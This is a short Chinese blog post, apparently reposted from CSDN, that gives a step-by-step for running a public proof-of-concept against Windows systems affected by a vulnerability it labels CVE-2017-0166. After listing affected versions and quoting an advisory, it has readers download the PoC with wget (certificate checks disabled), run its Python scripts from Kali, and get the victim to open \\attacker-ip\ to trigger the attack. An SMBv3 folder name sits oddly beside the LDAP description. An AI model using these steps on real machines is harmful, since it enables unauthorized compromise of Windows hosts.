版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396366
视频教程:ClickHere
poc地址:https://github.com/lgandx/PoC
受影响系统:
Microsoft Windows VistaMicrosoft Windows Server 2016Microsoft Windows Server 2012 R2Microsoft Windows Server 2012Microsoft Windows Server 2008Microsoft Windows RT 8.1Microsoft Windows 8.1Microsoft Windows 7Microsoft Windows 10
描述:
BUGTRAQ ID: 97446CVE(CAN) ID: CVE-2017-0166Microsoft Windows是流行的计算机操作系统。Microsoft Windows未正确计算LDAP请求缓冲区长度,在实现上存在权限提升漏洞,可使攻击者在提升的上下文中运行进程。<来源:Microsoft 链接:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0166>
下载到kali,并运行:
cd /tmp
wget -c --no-check-certificate https://github.com/lgandx/PoC/archive/master.zip
unzip PoC-master.zip
cd PoC-master/
cd SMBv3。。。。。剩下table自动补齐
python odict.py
python win10.py
如果没有触发,就Windows的运行窗口下。
\\攻击者ip\
触发一下。